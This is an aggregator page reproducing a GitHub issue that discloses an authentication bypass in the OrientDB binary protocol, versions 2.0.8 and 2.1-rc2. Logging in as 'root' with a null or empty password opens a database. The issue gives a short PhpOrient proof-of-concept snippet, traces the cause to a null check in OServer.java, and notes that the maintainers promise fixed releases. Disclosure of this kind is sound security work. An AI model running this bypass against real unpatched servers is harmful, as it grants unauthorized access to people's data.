Lightrun Answers was designed to reduce the constant googling that comes with debugging 3rd party libraries. It collects links to all the places you might be looking at while hunting down a tough bug.
And, if you’re still stuck at the end, we’re happy to hop on a call to see how we can help out.
security issue in binary protocol
See original GitHub issueHi, I am having quite a security issue in the binary protocol in REQUEST_DB_OPEN. By setting user-name to “root” and user-password to 4 bytes xFF the db is opened regardless what the real root passwort is.
This can be reproduced by using the PhpOrient driver and the following code:
require 'PhpOrient/vendor/autoload.php';
use PhpOrient\PhpOrient;
$client = new PhpOrient( 'localhost', 2424 );
$client->dbOpen('GratefulDeadConcerts', 'root', null);
print_r($client->query( 'select from V' ));
I can use both null or an empty string "" as password here without knowing the real root password. PhpOrient transfers an empty password as pack('N', -1) which results in 4 Bytes xFF. This only works with “root”, any other user (e.g. “admin”) requires the proper password.
I posted this here since I think this is an issue in the binary protocol and not in PhpOrient. Is my configuration somehow wrong or can anybody confirm this behaviour? I tried this both with OrientDB 2.0.8 and 2.1-rc2.
Issue Analytics
- State:
- Created 8 years ago
- Comments:5 (3 by maintainers)
Top Results From Across the Web
Top Related Medium Post
Top Related StackOverflow Question
Troubleshoot Live Code
Top Related Reddit Thread
Top Related Hackernoon Post
Top Related Tweet
Top Related Dev.to Post
Top Related Hashnode Post
Thank you for the confirmation. @lvca So this is pretty serious, right? I narrowed the problem down to Line 464 in OServer.java:
iPassword == nullI can’t believe this! What kind of backdoor is that? I hope this is by design and the null password should be prevented on a higher level in the binary protocol.Thanks @micha-nerdlichter for the report. We’ll release 2.0.10 and 2.1-rc3 asap.